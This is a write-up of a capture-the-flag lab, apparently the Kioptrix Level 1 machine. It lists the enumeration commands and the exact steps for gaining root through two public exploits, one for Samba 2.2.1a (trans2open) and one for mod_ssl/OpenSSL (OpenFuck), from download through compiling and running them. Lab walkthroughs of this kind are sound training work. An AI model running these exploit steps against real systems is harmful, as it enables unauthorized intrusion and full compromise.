First, I went ahead and launched a port scan against the target machine.
nmap -Pn -A -sV -p- kioptrix1.vhub
smbclient -L \\\\$target
Using this method, I was able to retrieve the samba server version.
Unix.Samba 2.2.1a MYGROUP
WEB - 80
/cgi-bin/ (Status: 403) [Size: 272] /cgi-bin/.html (Status: 403) [Size: 277] /index.html (Status: 200) [Size: 2890] /index.html (Status: 200) [Size: 2890] /manual (Status: 301) [Size: 294] /mrtg (Status: 301) [Size: 292] /test.php (Status: 200) [Size: 27] /usage (Status: 301) [Size: 293] /~operator (Status: 403) [Size: 273] /~root (Status: 403) [Size: 269]
WEB - 443
Since the samba version being used by the target was uncovered, I decided on look at exploit db for any public exploits that might be available.
searchsploit samba 2.2
I discovered an RCE exploit that supposedly worked on any version below
Samba 2.2.8. This fit our target perfectly.
searchsploit -m multiple/remote/10.c
I then proceeded to compile the exploit before executing it.
gcc -o exploity 10.c
Since we uncovered that our target was running Linux|Red Hat during our enumeration phase, I set
-b as linux and fired it at the target.
./exploity -b 0 $target
And I was in the machine as root!
During the enumeration phase, I also noticed that the OpenSSL version was wayyy too old. A quick look at exploit db revealed multiple exploits that were targeted at that version.
I pulled the exploit down and realized that there were some edits that I had to make to the exploit.
After editing the exploit, I compiled and ran it as follows. Also, do remember to install
libssl-dev if you dont already have it.
gcc -o OpenFuck OpenFuck.c -lcrypto
Next I just had to select the correct offset for my target and I was good to go.
Apache and OS version was uncovered during the enumeration stages.
443/tcp open ssl/https syn-ack ttl 64 Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
./openfuck 0x6b 192.168.0.176 443 -c 50
And I was root...again!
Those were the two ways I was able to break this box!